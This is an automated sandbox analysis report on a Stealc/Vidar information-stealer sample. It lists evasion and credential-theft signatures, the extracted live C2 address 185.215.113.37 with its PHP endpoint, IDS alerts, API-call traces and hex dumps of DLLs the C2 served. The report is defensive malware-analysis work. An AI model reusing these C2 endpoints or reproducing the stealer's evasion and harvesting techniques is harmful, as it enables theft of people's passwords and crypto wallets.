Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1519233
MD5: d24e0805aa258eb338518bb2744da7ab
SHA1: be4d5e87ce9fda257186d524dec59acc7778bb8d
SHA256: e6dc69dd2c58c510a8a10593b4fbd5e9a4573fa2dcdf178c292e8b1fb7a13795
Tags: exeuser-Bitsight
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.37/e2b1563c6670f193.php5k Avira URL Cloud: Label: malware
Source: http://185.215.113.37/ Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpv Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.37 Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpo Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phption: Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpser Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dllA Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpdll Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dllN Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpP Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpD Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpHDGDGHCBGCAKFIIIE Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.37/NJ Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php3 Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpFirefox Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dlld Avira URL Cloud: Label: malware
Found malware configuration
Source: 0.2.file.exe.940000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: 0.2.file.exe.940000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00949B60 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00949B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0094C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_0094C820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00949AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00949AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00947240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00947240
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00958EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_00958EA0
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1934333564.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1934160372.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.1934160372.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1934333564.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00954910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00954910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0094DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0094DA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0094E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0094E430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0094F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0094F6B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00953EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00953EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_009416D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0094BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0094BE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_009538B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0094ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0094ED20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00954570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00954570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0094DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0094DE10
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.37:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 06:46:08 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 06:46:14 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 06:46:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 06:46:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 